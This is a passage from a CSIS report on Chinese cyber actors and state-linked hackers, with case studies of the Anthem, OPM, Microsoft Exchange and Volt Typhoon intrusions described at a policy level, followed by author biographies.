This broad jurisdiction was notably demonstrated in its surprise 2021 crackdown on DiDi Global, a Chinese ride-sharing company that went public in June 2021 through an initial public offering (IPO) on the New York Stock Exchange. Immediately after the IPO, the CAC launched a comprehensive cybersecurity review of the company, ordered that DiDi’s apps be removed from Chinese online stores for “illegally collecting personal information,” and fined the company $1.2 billion for violating “cybersecurity, data security, and personal information protection laws.” The exact reasons for the CAC’s intense scrutiny of DiDi remain unclear. Some speculate that DiDi may have angered the CAC by proceeding with its U.S. IPO despite the agency’s request for a delay. Others suggest the move was politically motivated rather than security-driven or that DiDi’s frequent rule-bending became a problem, though the specific political objectives remain unclear.

Public/Private

NONGOVERNMENTAL ACTORS

• National Cybersecurity Center

One step removed from the government are organizations like the National Cybersecurity Center, which houses multiple research and talent centers, laboratories, and an operational national cybersecurity school. Two of its labs, the Combined Cybersecurity Research Institute and the Offense-Defense Lab, conduct cybersecurity research for the Chinese government. Furthermore, in 2017, China established the Central Commission for Integrated Military and Civilian Development within the 360 Enterprise Security Group—one of China’s most prominent cybersecurity companies—with the aim of “enhancing private sector cooperation” with the PLA and furthering its cyber warfare capabilities. China has also called on private entities for certain tasks, though this area is thinly studied. This project will attempt to identify trends in China’s use of ostensibly private entities for developing accesses and conducting offensive operations in the cyber domain.

• Patriotic Hackers and Hacktivists

China is home to a large array of patriotic hackers, primarily from the private sector. These hackers first gained notoriety for defacing U.S. government websites in response to the accidental 1999 bombing of the Chinese embassy in Belgrade, marking the first documented cyber operation by actors based in China against the United States. However, since 2015, the central government has gradually tightened its control over these groups, which now largely operate under the loose supervision of intelligence officers and primarily focus on surveillance and espionage rather than incendiary offensive cyber operations.

China also employs more independent, less supervised cyber volunteers known as hacktivists. This group consists primarily of malware developers and security researchers who engage in large-scale, politically motivated cyber operations such as DDoS attacks, foreign network defacement, and data destruction. Hacktivist activity often includes high-profile cyberattacks on Taiwan in response to specific events. For instance, immediately before then- U.S. Speaker of the House Nancy Pelosi’s visit to Taiwan in August 2022, Chinese hacktivists hit the websites of then-Taiwanese President Tsai Ing-wen, the National Defense Ministry, the Foreign Affairs Ministry, and the Taiwan Taoyuan International Airport, the island’s largest airport, with DDoS attacks. Some 7-Eleven convenience store television screens were also hacked, displaying the message: “Warmonger Pelosi, get out of Taiwan!” Since these attacks were ostensibly carried out by independent hackers, Beijing could deny involvement, but it is likely that Beijing played some role in enabling these activities or, at the very least, turned a blind eye to them.

To strengthen its hacker network, China frequently also hires individuals as contractors for offensive cyber tasks or recruits them into information security roles and programming positions affiliated with the MSS or MPS. As with MSS-affiliated front companies, the blurred line between Chinese government actors and state-sponsored actors makes it especially challenging for outside countries to attribute responsibility for the actions of these patriotic hackers and hacktivists. According to Amy Chang of the Center for a New American Security (CNAS), the Chinese government uses non-state actors to “credibly signal coercive threats” on its behalf, targeting countries with which the CCP has conflicts or disagreements. This assessment is supported by researcher Jeffrey Kwong, who found a recurring pattern in which official threats issued by the Chinese government against a country are often followed by cyberattacks carried out by Chinese hacktivist groups.

However, Kwong also notes that many of these hacktivist groups are relatively “uncontrolled and more nationalistic than the state,” posing a “risk of domestic unrest” if the Chinese government retreats from its threats. Ultranationalist hacktivist groups have even launched cyberattacks against the Chinese state to “express displeasure” about perceived CCP restraint, which also often “coincide with periods of discontent with the CCP.” For example, in 2014, a hacktivist group hijacked the state television network in Wenzhou to broadcast “nationalistic and anti-CCP messages,” likely in protest against the detention of Wang Bingzhang, a nationalist activist.

Case Studies

Case Study 1: The Great Sucking Sound: Data Leaves in Droves

China has been highly effective at stealing massive amounts of data. Since 2014, China has hacked and stolen the data of about 80 percent of Americans. In the attack that year on the health insurance company Anthem, China exfiltrated an estimated 79 million member names, birth dates, Social Security numbers, and highly sensitive personally identifiable information. The same year, China’s hack of OPM compromised 21.5 million personnel records. Millions more records followed in the 2016 hack of Starwood Hotels and in the 2017 hack of Equifax. Data at this scale is helpful for a range of uses, including training AI models, identifying vulnerabilities among people with security clearances, and informing potential influence campaigns.

Some of these hacks have involved hoovering up data seemingly indiscriminately, but four instances in particular suggest a campaign to create a constellation of highly useful data. The first occurred on February 18, 2014, when the Chinese state-backed group Deep Panda used a phishing scam to trick an Anthem employee into opening an e-mail containing malware. Once opened, the email deployed malware on the employee’s computer, allowing the attackers to infect the device and move laterally within Anthem’s networks, ultimately gaining access to “over 50 employee accounts and 90 different systems.” Among these systems was Anthem’s data warehouse, which stored records for “millions” of Anthem members. From February to December 2014, the group successfully exfiltrated approximately 78.8 million member records, including names, birthdates, Social Security numbers, email addresses, home addresses, and patient financial data. It was not until January 27, 2015, that Anthem discovered the breach and notified law enforcement. By then, however, the damage was done. The 2014 Anthem hack remains the largest known cyber incident in the U.S. healthcare industry.

What makes the Anthem hack even more notable is that the malware used in the initial breach was likely developed by Chinese university students only a few months prior. ThreatConnect was able to trace the IP address embedded in the Anthem malware back to the 2014 TOPSEC Cup, a student hacking competition sponsored by Southeast University’s Information Security Research Center in Nanjing and the Beijing Topsec Network Security Technology Company, a defense contractor partially funded by the PLA. The competition, which reportedly awarded an internship at Beijing Topsec as the final prize, is believed to have awarded points to students for hacking real targets inside the United States. Deep Panda hackers are believed to have modified malware developed in this competition for their breach of Anthem. Southeast University is also known for connecting promising students to jobs in government security services and “research positions,” drawing from a consistent pipeline of young talent for the MSS.

The second incident occurred concurrently with the 2014 Anthem hack, when the same APT, Deep Panda, is also believed to have breached OPM. According to CSO Online, this breach began when the group successfully compromised the systems of USIS and KeyPoint, two U.S. government contractors that were conducting background checks on government employees with “access to OPM servers.” These initial breaches trace back to December 2013; however, OPM officials did not detect the breach until March 2014. Notably, because OPM officials determined that the hackers were “confined to a part of the network that didn’t have any personnel data,” they chose not to immediately expel the hackers, opting instead to monitor their activity to gather counterintelligence. According to a report by the House Committee on Oversight and Government Reform, OPM planned a “Big Bang” system reset to expel the hackers on May 27, 2014. However, by this time, Deep Panda had already used stolen credentials from its earlier KeyPoint hack to establish a secondary, hidden foothold within OPM’s network and create a backdoor. After the May 27 reset, Deep Panda retained access to OPM’s networks, quietly exfiltrating data from July to October 2014. By October, the group had used OPM’s compromised network to breach the Department of the Interior’s servers, which contained millions of U.S. government personnel records. This continued through December 2014, resulting in the exfiltration of an additional 4.2 million personnel records. By March 2015, federal personnel fingerprint data had also been compromised.

Overall, the OPM breach resulted in the theft of 21.5 million records, including some of the most sensitive data, such as “millions” of SF-86 forms, which contain personal background check information for individuals seeking U.S. government security clearances, including details on “past drug use, financial history, mental health history and personal relationships,” as well as information about their friends, family members, known associates, and contacts abroad. The breach also compromised the fingerprints of 5.6 million federal employees and the information of 3.6 million current and former government employees. According to a July 2015 OPM statement, “If an individual underwent a background investigation through OPM in 2000 or afterwards . . . it is highly likely that the individual is impacted by this cyber breach.”

Since these two major attacks, China has also been implicated in other high-profile breaches, though it remains unclear if the same APT, Deep Panda, was responsible. In 2016, hackers successfully compromised Starwood Hotels’ reservation system and stole the credit card and passport information of approximately 500 million people. In 2017, Beijing’s hackers broke into Equifax, a credit reporting agency, and stole the financial information of approximately 148 million Americans, including hundreds of thousands of credit card numbers and credit dispute documents. This combination of data is highly valuable to Beijing, as it can help identify U.S. government employees with security clearances who have financial or health issues, track their past and upcoming travel, and create opportunities for recruitment.

Case Study 2: Exchange Hack

From January to March 2021, hackers associated with the HAFNIUM group (possibly Kryptonite Panda) conducted a rapid and audacious campaign of data exfiltration. As early as January 3, 2021, the hackers began conducting cyber espionage operations against on-premises Microsoft Exchange servers. In February, attacks spread globally.

In early March, Microsoft finally detected multiple zero-day exploits targeting its on-premises Microsoft Exchange Server. CISA followed rapidly with an emergency directive, instructing all Federal Civilian Executive Branch agencies to “immediately disconnect Microsoft Exchange on-premises servers” and conduct incident response procedures. As Microsoft prepared to issue a patch on its normal release schedule (March 9 or “patch Tuesday”), attacks increased between Friday, March 5, and Monday, March 8, and Chinese operators began to exfiltrate huge amounts of information, particularly emails. According to Tom Burt, Microsoft’s then-corporate vice president for security and trust, Microsoft saw attacks grow from “hundreds a day . . . [to] north of several thousand a day.” Security researchers eventually assessed that China breached more than 30,000 servers in the United States and hundreds of thousands worldwide.

This attack showed the power of a hybrid approach, where skilled government hackers quietly capitalized on the vulnerability. However, as soon as Beijing saw Microsoft ready to patch, a huge number of attackers apparently joined the operation. To what end is unclear: that much data may or may not ever be fully exploited and useful, but one potential use might be to train AI large language models.

Case Study 3: Volt Typhoon

In late 2023 and throughout 2024, U.S. entities revealed a Chinese effort to compromise critical infrastructure in the mainland United States and Guam. The attacks produced little to no intelligence value; instead, they seemed designed to hold U.S. infrastructure at risk of outage at a time of China’s choosing.

In December 2023, Lumen Technologies uncovered the KV-botnet, a botnet likely developed by Volt Typhoon. According to a January 2024 DOJ indictment, most of the compromised devices were outdated Cisco and NetGear routers that had reached “end of life” status, meaning they no longer received security patches or updates. Volt Typhoon exploited these vulnerabilities using LOTL techniques to covertly infiltrate SOHO routers, firewalls, and VPNs across the United States.

Volt Typhoon embedded itself into the networks of “aviation, rail, mass transit, highway, maritime, pipeline, water and sewage organizations.” Earlier attacks successfully breached the internet servers of the Port of Houston, the largest U.S. port by total annual tonnage, in September 2021, as well as the two largest telecommunications providers in Guam. Chinese cyberattacks on U.S. critical infrastructure likely predate 2021, as breaches were detected as early as December 2011 and 2013 within the systems of U.S. oil and natural gas pipelines. However, CISA has not formally attributed these breaches to a specific APT, and there is no indication that they were the work of Volt Typhoon.

▲ Figure 3: Volt Typhoon Attack Diagram. Source: Microsoft Threat Intelligence, “Volt Typhoon Targets US Critical Infrastructure with Living-off-the-Land Techniques,” Microsoft Security (blog), Microsoft, May 24, 2023.

China’s true agenda is almost certainly sabotage. According to Microsoft, Volt Typhoon is developing capabilities that could “disrupt critical communications infrastructure between the United States and Asia during future crises.” CISA has noted that most of Volt Typhoon’s identified targets, such as mass transit systems or water treatment facilities, “have no legitimate espionage value.” Coker, at the time serving as national cyber director, warned that Volt Typhoon’s efforts are designed to “disrupt [the U.S.] military’s ability to mobilize,” while then-FBI Director Wray stated that the group is preparing to “wreak havoc and cause real-world harm to American citizens and communities if and when China decides the time has come to strike.”

Similarly, the 2024 Annual Threat Assessment of the U.S. Intelligence Community indicates that if China perceives an “imminent” conflict with the United States, it might consider launching “aggressive cyber operations against critical U.S. critical infrastructure and military assets . . . [to] deter U.S. military action, . . . impede U.S. decisionmaking, induce societal panic, and interfere with the deployment of U.S. forces.” U.S. authorities have also found “software tools left behind that could be used to destroy infrastructure components,” warning that if the United States “go[es] to war with [China], they will try to turn them on.” A compromise of critical infrastructure around U.S. military bases—such as power grids or water treatment facilities—could slow U.S. mobilization and buy China enough time to successfully blockade Taiwan. Even a 24-hour delay in the U.S. response could shift the balance in China’s favor and secure its control over the island.

The length of time Volt Typhoon has managed to remain covertly embedded within U.S. critical infrastructure is also a serious concern. According to The Guardian, intelligence officials estimate that Volt Typhoon has “maintain[ed] access and footholds” in U.S. systems for as long as five years. As early as 2009, U.S. intelligence officials observed China attempting to “map [U.S.] infrastructure,” including electrical grids.

Aosheng Pusztaszeri is a research assistant with the Intelligence, National Security, and Technology (INT) Program at CSIS, where he focuses on emerging technologies and their implications for national security. Prior to joining CSIS, Aosheng interned in the U.S. Senate and the U.S. House of Representatives and worked as an undergraduate research assistant in Cornell University’s Department of Government.

Emily Harding is director of the Intelligence, National Security, and Technology (INT) Program and vice president of the Defense and Security Department at CSIS. As the head of the INT Program, she provides thought leadership on the most critical issues facing intelligence professionals and on the future of intelligence work. She also serves as vice president of the Defense and Security Department, where she is responsible for leading a team of world-renowned scholars providing policy solutions that shape national security. Drawing on her decades of experience in national security, Emily has established herself as an expert on how technology is revolutionizing national security work. Harding has served in a series of high-profile national security positions at critical moments.

Julia Dickson is a research associate with the Intelligence, National Security, and Technology (INT) Program at CSIS. Her research interests include cybersecurity and cybercrime and the role of technology in conflict. Prior to joining CSIS, she was awarded a Fulbright grant and spent a year teaching English in Osh, Kyrgyzstan. She was also previously a research assistant at the Wilson Center, an intern for the Conventional Defense Program at the Stimson Center, and a communications and outreach intern at the International Crisis Group.